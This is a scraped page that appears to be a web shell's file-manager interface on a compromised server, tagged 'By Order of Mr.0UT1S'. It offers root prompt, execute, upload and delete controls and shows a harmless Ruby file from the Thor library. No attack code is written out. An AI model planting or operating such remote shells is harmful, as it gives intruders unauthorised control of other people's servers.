opt
/
alt
/
ruby26
/
lib64
/
ruby
/
2.6.0
/
bundler
/
vendor
/
thor
/
lib
/
thor
/
core_ext
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
hash_with_indifferent_access.rb
2.12 KB
Rename
Delete
io_binary_read.rb
308 bytes
Rename
Delete
ordered_hash.rb
2.59 KB
Rename
Delete
class IO #:nodoc: class << self unless method_defined? :binread def binread(file, *args) raise ArgumentError, "wrong number of arguments (#{1 + args.size} for 1..3)" unless args.size < 3 File.open(file, "rb") do |f| f.read(*args) end end end end end
Save